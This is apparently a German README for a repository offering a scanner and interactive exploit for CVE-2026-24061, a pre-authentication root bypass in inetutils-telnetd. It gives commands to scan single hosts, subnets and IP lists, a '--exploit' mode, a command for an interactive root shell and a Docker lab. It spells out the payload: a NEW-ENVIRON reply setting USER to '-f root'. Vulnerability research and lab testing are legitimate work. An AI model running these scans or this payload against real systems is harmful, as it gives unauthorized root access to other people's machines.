
Scanner und interaktiver Exploit für CVE-2026-24061 in inetutils-telnetd, der Pre-Auth-Root-Zugriff über manipulierte NEW-ENVIRON-Aushandlung ermöglicht. Enthält mehrthreadiges Scannen und Docker-Lab.
👨💻 Autor: Furkan KAYAPINAR (@FurkanKAYAPINAR)
Dieses Repository enthält einen Vulnerability-Scanner und einen interaktiven Exploit für CVE-2026-24061. Diese Schwachstelle betrifft inetutils-telnetd (und potenziell andere Telnet-Implementierungen) durch unsachgemäße Verarbeitung der Telnet-Option NEW-ENVIRON, die einen Remote-Zugriff vor der Authentifizierung mithilfe des Payloads -f root ermöglicht.
--exploitinetutils-telnetd für sichere Tests ausführt.Stellen Sie sicher, dass Python 3.x installiert ist.
git clone https://github.com/FurkanKAYAPINAR/CVE-2026-24061-telnet2root.git
cd CVE-2026-24061-telnet2root
## Verwendung
Scannt Ziele auf die NEW-ENVIRON-Schwachstelle.
# Ein einzelnes Ziel scannen
python3 scanner.py -t 192.168.1.100 -p 1903
# Ein Subnetz scannen
python3 scanner.py -s 192.168.1.0/24 -p 1903
# Eine Liste von IPs scannen und aktive Ausnutzung versuchen (RCE-Prüfung)
python3 scanner.py -l ips.txt -p 1903 --exploit
Erlangen Sie interaktiven Root-Shell-Zugriff.
python3 exploit.py -t 127.0.0.1 -p 1903
Stellen Sie eine lokale verwundbare Umgebung für Tests bereit:
cd lab
docker-compose up -d --build
Die Schwachstelle wird während der Telnet-Aushandlungsphase ausgelöst. Indem auf die DO NEW-ENVIRON-Anfrage des Servers mit einem speziell konstruierten IS VAR "USER" VALUE "-f root"-Sub-Negotiation-Paket geantwortet wird, wird der serverseitige telnetd-Prozess dazu verleitet, das Flag -f root an den login-Prozess weiterzugeben und so die Authentifizierung zu umgehen.
[!WARNUNG]
Dieses Tool dient ausschließlich Bildungszwecken und autorisierten Sicherheitstests. Unautorisierter Zugriff auf Computersysteme ist illegal und unethisch.